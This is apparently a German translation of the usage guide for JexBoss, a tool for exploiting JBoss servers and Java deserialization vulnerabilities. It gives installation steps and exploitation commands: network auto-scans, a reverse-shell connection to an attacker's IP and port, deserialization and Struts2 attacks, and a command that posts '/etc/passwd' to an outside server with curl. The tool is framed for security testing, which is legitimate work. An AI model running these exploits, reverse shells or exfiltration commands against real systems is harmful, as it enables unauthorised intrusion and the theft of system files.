
JexBoss: Jboss (und Java-Deserialisierungsschwachstellen) Verifizierungs- und Exploitation-Tool
JexBoss ist ein Werkzeug zum Testen und Ausnutzen von Schwachstellen im JBoss Application Server und anderen Java-Plattformen, Frameworks, Anwendungen usw.
Um die neueste Version von JexBoss zu installieren, verwenden Sie bitte die folgenden Befehle:
git clone https://github.com/joaomatosf/jexboss.git
cd jexboss
pip install -r requires.txt
python jexboss.py -h
python jexboss.py -host http://target_host:8080
ODER:
Download the latest version at: https://github.com/joaomatosf/jexboss/archive/master.zip
unzip master.zip
cd jexboss-master
pip install -r requires.txt
python jexboss.py -h
python jexboss.py -host http://target_host:8080
Falls Sie CentOS mit Python 2.6 verwenden, installieren Sie bitte Python 2.7. Installationsbeispiel von Python 2.7 auf CentOS mit Collections Software SCL:
yum -y install centos-release-scl
yum -y install python27
scl enable python27 bash
Falls Sie Windows verwenden, können Sie Git Bash nutzen, um JexBoss auszuführen. Befolgen Sie die nachstehenden Schritte:
PATH=$PATH:C:\Python27\
PATH=$PATH:C:\Python27\Scripts
git clone https://github.com/joaomatosf/jexboss.git
cd jexboss
pip install -r requires.txt
python jexboss.py -h
python jexboss.py -host http://target_host:8080
Das Werkzeug und die Exploits wurden entwickelt und getestet für:
Die Ausnutzungsvektoren sind:
$ python jexboss.py

$ python jexboss.py -u http://192.168.0.26:8080

$ python jexboss.py -h
$ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080 -results results.txt

$ python jexboss.py -mode auto-scan -A -network 192.168.0.0/24 -ports 8080 -results results.txt


Nachdem Sie einen JBoss-Server ausgenutzt haben, können Sie die eigene JexBoss-Befehlsshell verwenden oder eine Reverse-Verbindung mit dem folgenden Befehl herstellen:
jexremote=YOUR_IP:YOUR_PORT
Example:
Shell>jexremote=192.168.0.10:4444

Bei Ausnutzung von Java-Deserialisierungsschwachstellen (Anwendungs-Deserialisierung, Servlet-Deserialisierung) sind die Standardoptionen: eine Reverse-Shell-Verbindung herstellen oder einen Befehl zur Ausführung senden.
$ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name --cmd 'curl -d@/etc/passwd http://your_server'
$ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name
$ python jexboss.py -u http://vulnerable_java_app/path --servlet-unserialize
$ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2
$ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2 --cookies "JSESSIONID=24517D9075136F202DCE20E9C89D424D"
$ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080,80 -results report_auto_scan.log
$ python jexboss.py -mode file-scan -file host_list.txt -out report_file_scan.log